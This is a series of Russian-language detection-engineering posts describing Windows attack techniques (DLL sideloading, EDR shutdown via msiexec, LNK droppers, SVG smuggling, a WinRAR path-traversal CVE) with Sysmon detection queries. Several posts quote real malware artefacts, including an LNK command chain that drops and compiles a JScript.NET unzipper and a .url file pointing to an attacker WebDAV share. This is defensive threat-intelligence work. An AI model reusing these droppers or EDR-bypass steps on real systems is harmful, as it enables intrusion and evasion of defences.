Всем привет 💻✌️

Продолжим тему с созданием служб сторонними утилитами и рассмотрим сегодня srvany-ng

Создается служба из консоли cmd или powershell:

sc create "MyServiceName" start= auto binPath= "C:\Path\To\srvany-ng.exe"

это уже подозрительное поведение, на которое можно обратить внимание, или подготовить автореспонс на проверку репутации файла (отправку в пески)

Для мониторинга можем использовать следующую информацию о файле:

Description = Run any Windows application as a Service.
Product = srvany-ng
Company = Anthony Birkett
OriginalFileName = srvany-ng.exe

🔤 Правило корреляции можно сделать на отслеживание цепочки запуска процессов svchost.exe -> *.exe -> *.exe
Скорее всего нужно будет профилировать

🔤 Для хантинга можем поискать следующую информацию в реестре:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\*\Parameters\ ключ Application - путь к файлу который запустит служба

Дополнительно в Application могут быть ключи:

AppDirectory 
AppParameters
AppEnvironment
RestartOnExit

⚠️ Можно проверить, что файл службы имеет расширение exe и файл в Application - тоже имеет расширение exe

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Получают ли Ваши сотрудники файлы SVG?

ЛК представили небольшой обзор злоупотребления SVG.

SVG (Scalable Vector Graphics) формат описания графики в xml, который позволяет встраивать скрипты JS и теги HTML

SVG используются для доставки следующего этапа при использовании техники SVG-Smuggling (poc) или для перенаправления жертвы на следующий ресурс (пример)

🔭 Обнаружение:

🔤 Создание svg-файлов в директориях пользователя

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 11 and TargetFilename = "?:\Users\.*\.svg"

🔤 Детект на основе ADS NTFS

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 15 and TargetFilename endswith ".svg:Zone.Identifier" and Contents=".*ZoneId=3.*"

🔤 Мониторить создание процессов у которых в аргументах содержится ".*svg\s.*"

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Раннее мы рассмотрели использование WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера. WebDAV не единственный протокол, которым злоупотребляют злоумышленники, давайте рассмотрим - SMB

Для монтирования сетевой папки, часто используют команду net use или в попытке получить хеш пользователя атакуют с помощью ntlm leak

🔭 Обнаружение:

🔤 Мониторим запуск net.exe или net1.exe с аргументами use

🔤 Отслеживаем создание процессов, которые начинаются с \\ или буквы тома, которая не используется, например процессы запускались с томов F: и D:, а потом notmalware.exe с тома Q:

🔤 отслеживаем исходящие сетевые соединения на 445 порт за пределами корпоративной сети

🔤 В журнале Microsoft-Windows-SMBClient/Connectivity можем найти, к каким SMB-серверам были подключения, используем для отслеживания новых и ретро по старым событиям

🎯 Для хантинга можем проверить:

🔤 ветку реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\ на наличие параметров, начинающихся с ## (экранирование \\) или https, http

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Много обсуждений вызвали репорты Solar 4rays и ЛК об уязвимостях в VipNet, которые связанны с загрузкой вредоносных dll или подменой системных утилит. Аналогичные проблемы присутствуют во многих продуктах.

Для выполнения вредоносного кода из dll, может использоваться несколько техник, которые MITRE объединили в DLL. Она включает:

🔤 DLL Sideloading
🔤 DLL Search Order Hijacking
🔤 DLL Redirection
🔤 Phantom DLL Hijacking
🔤 DLL Substitution

🔭 Обнаружение:

🔤 отслеживаем создание новых dll файлов в директориях, где хранится исполняемый файл, и их загрузку в память процесса

🔤 запуск процесса и загрузка dll (без подписи или с невалидной подписью) из одной директории в профиле пользователя (\w:\\\\users\\.*\\.*\.dll$). Можно объединить с предыдущим

🔤 запуск процессов с именами системных утилит, с нестандартной цифровой подписью (отсутствием ее) или из нестандартных путей c:\windows\system32 c:\windows\syswow64 c:\windows\winsxs

🔤 загрузка dll или запуск дочернего процесса, которые ранее не использовались (нужно использовать ретро)

Скорее всего будет очень шумно...

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Недавно обсуждали уязвимости в EDR/VPN, а у EDR SentinelOne, бага by design, которая позволяет остановить службы через обновление продукта.

Как это работает❓
🔤 Как правило, во время обновления или восстановления продукта, службы и процессы EDR останавливаются
🔤 Злоумышленик запускает обновление (восстановление) через msiexec, и в момент когда процессы и службы потушились, хакер убивает процесс msiexec.exe, что приведёт к сбою установки и оставит систему без защиты.

Важные нюансы:
🔤 Уязвимость актуальна, только если вендор не реализовал механизмы самозащиты (блокировка остановки служб, запрет деинсталляции без прав админа и т.д.) или они отключены
🔤 Хакерам не нужно искать оригинальные MSI-файлы — установленные пакеты кешируются в %WINDIR%\Installer

🔭 Обнаружение:

🔤 Обнаруживаем локальные попытки установки edr/av msiexec /i или восстановления msiexec /fa
🔤 Обнаруживаем попытки использования пакетов из %WINDIR%\Installer, совпадающих с вашим вендором или установкой по GUID, который можно найти в реестре HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
🔤 Отслеживаем, используемые версии средств защиты
🔤 Отслеживаем запуск msiexec от подозрительных родительских процессов
🔤 В журнале Application отслеживаем события от провайдера MsiInstaller


События при нормальной установке пакета

1040 (путь к msi-файлу, и pid процесса, который запустил установку) -> 1042 (путь к msi-файлу, pid процесса, который запустил установку) -> 11707 (установка успешна, можем увидеть имя продукта\производителя)-> 1033 (установка завершена с кодом 0, тут можем увидеть sid-пользователя, название продукта и версию, может быть полезно для заполнения контроля установленных версий)

События при удалении пакета

11724 -> 1034 (продукт удален, тут можем увидеть название продукта и версию) 

Событие при обновлении конфигурации

11728 (обновление конфигурации) - генерируется при запуске той же версии msi-пакета

События при завершении установки с ошибкой

1033 (название продукта и версию, с кодом завершения отличным от 0) ->11708 (установка завершена с ошибкой, sid-пользователя, название продукта)

Эти события интересуют нас больше всего, именно они сгенерировались в момент обновления/восстановления продукта через msiexec

Дополнительно информацию об установленных пакетах можно посмотреть в реестре - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\<SID>\Products\<GUID>\InstallProperties . В этом разделе реестра есть интересный ключ - InstallSource по которому можно похантить аномалии в установке EDR и т.п.

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️
Что происходит, когда админ забыл пароль от локальной учетки? Смотрит laps?)
Или по-старинке заменит sethc.exe (utilman.exe) на cmd.exe, и создаст нового пользователя?

Последний вариант, может стать точкой входа для хакеров. Представим ситуацию, админ за собой не убрался, сервер торчит в интернет (такого не бывает 😄)

Плохие парни нажимают пару раз shift и получают права system 👤на серваке

🔭 Что же нам делать?

🔤 отслеживаем копирование системных файлов sethc.exe, utilman.exe, osk.exe, Magnify.exe, Narrator.exe, DisplaySwitch.exe
🔤 хантим, чтобы описание файла не отличалось от его имени
🔤 обнаруживаем запуск утилит из специальных возможностей, от родителя winlogon.exe и пользователя system
🔤 для профилактики берем хеш cmd.exe с каждого компа (если нет базы) и проверяем файловую систему на совпадения

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Рассмотрим атаку с безфайловым PowerShell-загрузчиком, который запускает Remcos RAT в память. 😈

Что происходит❓

Злоумышленники рассылают фишинговые письма с ZIP-архивами, внутри — поддельные LNK-файлы (часто маскируются под PDF или документы).

При открытии срабатывает цепочка:

🔤 LNK → MSHTA.exe — запускает обфусцированный HTA с удаленного ресурса.
🔤 HTA → PowerShell — vbs-скрипт используется как прокси, для запуска powershell команд: добавление в закреп HKCU:\…\CurrentVersion\Run, загрузки hta, ps1 и decoy-файла в C:\Users\Public, добавление директории C:\Users\Public в исключения Windows Defender (Add-MpPreference -ExclusionPath). В закреп добавлялась powershell-команда для запуска hta_)
🔤 In-Memory Loader — загруженный powershell декодирует base64, выделяет память через VirtualAlloc, копирует шеллкод и запускает его через CallWindowProcW, запускается Remcos RAT

Powershell Loader - может быть и супер крутой, обфусцированный, использует callback, но шаги до его запуска вообще не opsec)
Очень шумно, закреп hta в реестр, запуска hta с удаленного сервера, загрузка файлов через powershell, добавление в исключение defender...) powershell скрипт с base64 и virtualalloc


🔭 Обнаружение:
🔤 MSHTA.exe с http(s) точность близка к 100%
🔤 Закреп скриптов в HKLM\...\Run и HKCU\...\Run
🔤 Сетевые подключения от PowerShell (и в целом) на нестандартные порты за пределами корпоративной сети
🔤 Опасные командлеты в powershell VirtualAlloc, CallWindowProcW
🔤 Добавление исключений в defender (в AV)

Может получиться интересный хант

Мы можем собрать и группировать исключения AV с хостов. 
Обращаем внимание на пути, которые повторяются реже всего, если не пробили всю инфру))
Полезно проверять, что в директориях исключений AV лежит_) 

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Наконец-то досмотрел доклады с phd) Спасибо всем спикерам за проделанную работу и шеринг знаний)

Offense/Defense
🔤 Abuse GPO AD
🔤 Отключение EDR/AV
🔤 Смотрим глубже: ищем подозрительные COM-запросы на уровне ALPC
🔤 Опыт реального перехода на detection as code
🔤 Легитимные С2: как популярные сервисы работают на хакеров
🔤 Sysinternals глазами SOC
🔤 Подходы и техники для детекта «красных» утилит. Взгляд со стороны blue team, или то, как мы видим red team
🔤 Сколько стоит SOC на open source

Больше всего отклинулось внедрение ml/llm в разные области soc/cert🧠

🔤 От данных к действиям: ML в сердце DFIR
🔤 ИИ-агенты в киберразведке
🔤 Применение легковесных LLM в аналитических задачах ИБ
🔤 LLM и агенты: разгоняем SOC
🔤 AutoML threat detection: повышаем уровень автономности SOC

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

В отчете Bi.Zone рассмотрена работа двух вредоносных кампаний.

Давайте рассмотрим одну из них

🔤 Атака начинается с фишинга, пользователям присылают ссылку при переходе по которой загружается zip-архив с lnk и ini-файлом. INI по факту является архивом, в котором exe, dll и decoy-pdf. EXE - это легитимный бинарь с подписью, но уязвимый к загрузке dll

🔤 Выполняется команда LNK, которая ищет архив в каталоге пользователя %USERPROFILE%, создает JScript.NET файл. Он распаковывает zip-архив, замаскированный под расширение INI

set /p="import System;import System.IO;import System.IO.Compression;import System.Text;import System.Diagnostics;function Main(){var args:String[]=System.Environment.GetCommandLineArgs();Directory.CreateDirectory(args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[1], args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[2] + "\\" + (Convert.ToChar(117)+Convert.ToChar(109)+Convert.ToChar(46)+Convert.ToChar(105)+Convert.ToChar(110)+Convert.ToChar(105)), args[2]);Process.Start("cmd.exe", "/C move " + System.Reflection.Assembly.GetExecutingAssembly().Location + " " + System.Reflection.Assembly.GetExecutingAssembly().Location + "_");}Main();">%TEMP%\UKSS1G4Q7H6S.a

🔤 Далее проверяется наличие легитимного файла из вложенного архива, он запускается и загружает в память вредоносную библиотеку (С# Loader), для запуска файла используется команда start с применением обфускации

^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit

🔤 Если файла из шага 2 нет, то проверяется наличие unzip.exe (скомпилированный JScript.NET), который распаковывает фальшивый INI-файл

if exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7") 

🔤 Для запуска компиляции JScript.NET используется jsc.exe, который в свою очередь запускается с помощью LOLBAS - forfiles. Исполняемый файл сохраняется с именем %TEMP%\unzip.exe

(C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a")

Работа загрузчика подробно расписана в репорте, но стоит выделить основные моменты:

🔤 При обращении к серверу используется следующая строка заголовка User-Agent: «Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
🔤 Создается рабочий каталог %APPDATA%\74EJ6RTFKKRS
🔤 Для закрепления создается startapp.bat в каталоге автозагрузки, который запускает %APPDATA%\74EJ6RTFKKRS\H5GDXM70NJ.exe
🔤 Для защиты от песочниц следующего этапа, атакующие проверяют систему, и если он не соответствует критериям, то загружается hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf

🔭 Обнаружение

🔤 по классике, отслеживаем создание LNK-файлов
🔤 основным тригером для нас должны стать команды из LNK. набор триггеров и LOLBAS и .Net, касательно этой кампании можем поискать использование forfiles.exe и start.exe
🔤 создание скриптов в директории автозагрузки

Похантить можно:
🔤 user-agent User-Agent: «Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
🔤 наличие скриптов в директории автозагрузке пользователя
🔤 обращение на hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf

#detection@detectioneasy
#ttp@detectioneasy

⚠️ В Internet Explorer RCE, достаточно кликнуть по ссылке)

Отчет от CheckPoint, для атаки используется URL-файл - да опять)

Содержимое:

[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D

В целом ничего необычного, только iediagcmd.exe выполняет ряд команд:

ipconfig.exe /all
netsh.exe in tcp show global
netsh.exe advfirewall firewall show rule name=all verbose
route.exe print

В рабочей WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr хакеры размещают вредоносный route.exe, который и запускается после открытия файла

Также для атак использовался легитимный файл - CustomShellHost.exe

#detection@detectioneasy
#ttp@detectioneasy

🔭 Для обнаружения поведения выше воспользуемся правилами, которые описывали раннее и новыми:

🔤 ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and CurrentDirectory startswith "\\\\"

🔤 ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and Image startswith "\\\\"

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Интересная фишинговая кампания рассмотрена в блоге

Хакеры из Mustang Panda использовали DLL Sideloading, как бы Вы думали где? В Google Chrome

Для этого расположили dll - chrome_elf.dll в дирректории с номером версии - 101.0.4951.41\chrome_elf.dll, DLL-имеет невалидную цифровую подпись

🔤 ZIP-архив с вложенным Chrome, название которого мимикрирует под документ - The_Military_Balance_2025.exe и скрытая папка с атрибутами - hidden and system, что позволит скрыть дирректорию. В этой папке и хранится dll

🔤 Пользователь запускает исполняемый файл, происходит распаковка архива в %TEMP%, и загрузка вредоносной dll

🔭 Обнаружение

🔤 отслеживаем создание исполняемых файлов в temp с motw

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 15 and (TargetFilename endswith ".exe:Zone.Identifier" or TargetFilename endswith ".dll:Zone.Identifier" or TargetFilename endswith ".scr:Zone.Identifier" ) and Contents=".*ZoneId=3.*"

🔤 отслеживаем загрузку DLL без валидной подписи из одной дирректории с exe-файлом

ProviderName="Microsoft-Windows-Sysmon" and ImageLoadedPath startswith ImagePath and EventId = 7 and not (SignatureStatus = "Valid" and Signed=true)

sample

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Астрологи предсказывают неделю фишинга
Новая техника от mr.d0x альтернатива ClickFix - FileFix

#ttp@detectioneasy

Всем привет 💻✌️

mr.dox не дает отдыхать и выпускает FileFix2

Суть атаки - для решения captcha пользователю нужно сохранить html-страницу и при сохранении, поменять расширение на .HTA, файл сохранится без MoTW 😇

🔭 Для обнаружения FileFix2 отслеживаем цепочку процессов, например

mshta.exe -> powerhshell|cmd|cscript|curl|certutil - можно хоть весь LOLBAS перечислить

и запуск hta из директорий пользователя *:\Users\

#ttp@detectioneasy
#detection@detectioneasy

Всем привет 💻✌️

Давайте познакомимся со статьей trustedsec про использование встроенных VPN-клиентов в Windows.

Windows из коробки поддерживает клиенты для PPTP, L2TP, SSTP, IKev2 - не нужно приносить с собой сторонний клиент для организации доступа

🔭 Все не так страшно, мы можем относительно легко обнаружить такое поведение:

🔤 Доступ к файлу rasphone.pbk в:

 %appdata%\Microsoft\Network\Connections\Pbk\
C:\Users\All Users\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk

предварительно нужно настроить DACL

🔤 Отслеживаем события:

Channel="Application" and ProviderName="RasClient" and  (EventId = 20221 or EventId = 20222)

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️
Давайте познакомимся с C2-фреймворком OnionC2

Основное преимущество OnionC2 перед аналогами, по мнению автора, — это использование сети Tor для связи сервера и клиента.

By utilizing the Tor network, it ensures that communications between the C2 server and remote systems remain secure, anonymous, and available

🔭 Для формирования гипотез обнаружения и Threat Hunting обратим внимание на следующие особенности агента:

🔤 Для проверки реального IP-адреса агент использует сервис https://checkip.amazonaws.com

🔤 Из коробки идет два варианта закрепа - реестр и Shortcut Takeover

🔤Для реестра, стандартно, отслеживаем создание ключей в *\Software\\Microsoft\\Windows\\CurrentVersion\Run\, имя ключа - Agent

🔤 Shortcut Takeover - для изменения (или создания нового) используется ярлык %USERPROFILE%\Desktop\Microsoft Edge, целевой файл ярлыка - путь до агента, а значение аргумента - --run-lnk, укажет агенту запустить C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe

🔤 Для выполнения команд используется cmd.exe /C

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

У коллег из BI.ZONE вышел отчет об использовании новых уязвимостей в WinRAR

Уязвимости использовались для получения доступа к хостам жертв - фишинг.

Письмо имеет вложение - rar-архив, который эксплуатирует CVE‑2025‑6218. Уязвимость позволяет вредоносному архиву при распаковке записывать файлы за пределами целевого каталога - значит мы можем закрепиться в папку автозагрузки текущего пользователя.

🔭 Обнаружение строится достаточно легко:

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 11 and Image endswith "winrar.exe" and TargetFilename = ".*\Microsoft\Windows\Start Menu\Programs\Startup\"

Если атакующие продвинутые можно комбнировать несколько процедур, например заменить LNK на рабочем столе или разместить там RDP-rogue файл... Это уже будет другое правило)

#detection@detectioneasy
#ttp@detectioneasy